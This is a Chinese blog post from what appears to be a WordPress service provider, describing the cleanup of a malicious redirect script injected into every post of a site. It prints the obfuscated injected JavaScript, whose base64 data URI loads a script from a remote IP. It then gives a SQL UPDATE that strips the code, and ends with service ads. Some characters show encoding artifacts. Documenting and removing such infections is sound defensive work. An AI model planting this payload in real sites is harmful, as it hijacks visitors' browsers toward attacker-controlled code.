WordPress被SQL注入攻擊了怎么辦?
WordPress被SQL注入攻擊了怎么辦?前幾天一位老哥的網(wǎng)站上的文章末尾,全部被注入了一個(gè)JS代碼,進(jìn)入文章頁時(shí)會(huì)強(qiáng)制跳轉(zhuǎn),代碼如下) WordPress 注入 攻擊
前幾天一位老哥的網(wǎng)站上的文章末尾,全部被注入了一個(gè)JS代碼,進(jìn)入文章頁時(shí)會(huì)強(qiáng)制跳轉(zhuǎn),代碼如下
<!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"></script>')} </script><!--/codes_iframe-->

WordPress被SQL注入攻擊了怎么辦?
我去數(shù)據(jù)庫中查看,在wp_post表的wp_content字段中,也確實(shí)發(fā)現(xiàn)了這個(gè)代碼,但是,在數(shù)據(jù)庫搜索這個(gè)腳本時(shí),base64后面的字符串每個(gè)文章都是不一樣的,那就無法使用替代/刪除的辦法了。要是手動(dòng)刪除2000多個(gè)帖子,要?jiǎng)h到猴年馬月去。最終查詢了N多資料后,再國外的一個(gè)論壇上找到了解決辦法。
UPDATE wp_posts SET post_content =
SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1)
WHERE LOCATE('<!--codes_iframe-->', post_content) >0;
最終使用這行命令清除了2000+文章的惡意腳本

WordPress被SQL注入攻擊了怎么辦?
服務(wù)范圍:WordPress搭建、WordPress主題開發(fā)、WordPress二次開發(fā)、WordPress插件開發(fā)
其它服務(wù):網(wǎng)站建設(shè)、企業(yè)郵箱、數(shù)字證書ssl、400電話、
技術(shù)標(biāo)簽:企業(yè)網(wǎng)站、外貿(mào)網(wǎng)站、外貿(mào)商城、其它問題
聯(lián)系方式:電話:13714666846 微信同號(hào)
其它服務(wù):網(wǎng)站建設(shè)、企業(yè)郵箱、數(shù)字證書ssl、400電話、
技術(shù)標(biāo)簽:企業(yè)網(wǎng)站、外貿(mào)網(wǎng)站、外貿(mào)商城、其它問題
聯(lián)系方式:電話:13714666846 微信同號(hào)
相似內(nèi)容
- dedecms轉(zhuǎn)WordPress,織夢(mèng)ded...閱讀:92
- WordPress企業(yè)門戶網(wǎng)站搭建,...閱讀:154
- WordPress企業(yè)網(wǎng)站定制開發(fā),...閱讀:134
- 網(wǎng)頁開發(fā)外包公司 wordpress閱讀:82
- wordpress的優(yōu)缺點(diǎn)閱讀:126
- wordpress的優(yōu)點(diǎn)與缺點(diǎn)閱讀:124
- 網(wǎng)頁設(shè)計(jì)師如何對(duì)網(wǎng)頁注入情...閱讀:57
- 網(wǎng)站提高百度權(quán)重的4個(gè)方法-...閱讀:108
- 日本蘋果id賬號(hào)怎么注冊(cè)?閱讀:272
- 推特注冊(cè)怎么跳過手機(jī)號(hào)碼?閱讀:3654
- 日本AppleID官網(wǎng)注冊(cè)入口閱讀:890
- 谷歌賬號(hào)注冊(cè)無法驗(yàn)證手機(jī)什...閱讀:305